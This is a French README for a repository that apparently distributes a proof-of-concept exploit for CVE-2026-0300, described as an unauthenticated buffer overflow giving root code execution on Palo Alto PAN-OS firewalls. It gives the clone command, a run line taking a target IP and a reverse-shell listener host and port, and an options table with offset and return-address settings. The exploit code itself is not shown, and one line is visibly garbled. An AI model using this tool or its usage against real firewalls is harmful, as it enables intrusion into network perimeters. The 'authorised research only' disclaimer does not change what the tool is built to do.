
Preuve de concept pour CVE-2026-0300, un débordement de tampon critique dans le portail User-ID de PAN-OS permettant l'exécution de code à distance non authentifiée avec les privilèges root.
CVE-2026-0300 est une vulnérabilité de dépassement de tampon de haute sévérité identifiée dans le portail d'authentification User-ID™ (portail captif) de Palo Alto Networks PAN-OS. Ce dépôt de recherche démontre la logique technique de la vulnérabilité, en se concentrant spécifiquement sur la manière dont un paquet réseau non authentifié peut conduire à une exécution de code à distance (RCE) avec les privilèges root.
| Caractéristique | Détails |
|---|---|
| ID CVE | CVE-2026-0300 |
| Score de sévérité | 9.3 (Critique) |
| Type de faiblesse | CWE-787 : Écriture hors limites |
| Vecteur d'attaque | Réseau (non authentifié) |
| Privilèges requis | Aucun |
| Interaction utilisateur | Aucune |
| Logiciel concerné | PAN-OS 12.1, 11.2, 11.1, 10.2 |
La vulnérabilité se produit lorsque le service du portail d'authentification User-ID ne parvient pas à valider la longueur des données entrantes avant de les écrire dans un tampon mémoire.
socket, struct et argparse).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Cet outil est conçu avec une interface en ligne de commande (CLI) professionnelle.
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| Option | Nom | Description | Défaut |
|---|---|---|---|
| -t | --target | (Obligatoire) Adresse IP cible du pare-feu. | N/A |
| -p | --port | Le port exécutant le portail User-ID. | 6082 |
| -o | --offset | La longueur en octets pour atteindre le point de dépassement mémoire. | 2048 |
| -r | --ret | L'adresse de retour hexadécimale. | 0xdeadbeef |
| -l | --lhost | Adresse IP du shell inversé | Votre IP |
| -L | --lport | Votre port d'écoute | 4444 |
POUR LA RECHERCHE ÉDUCATIVE ET AUTORISÉE UNIQUEMENT. Les tests non autorisés contre des systèmes que vous ne possédez pas sont illégaux. L'auteur n'est pas responsable de toute utilisation abusive de ce code de recherche. Utilisez-le de manière responsable pour améliorer la sécurité mondiale. Développé par : https://t.me/p3Nt3st3rsTAr Date de découverte de la vulnérabilité : 07 mai 2026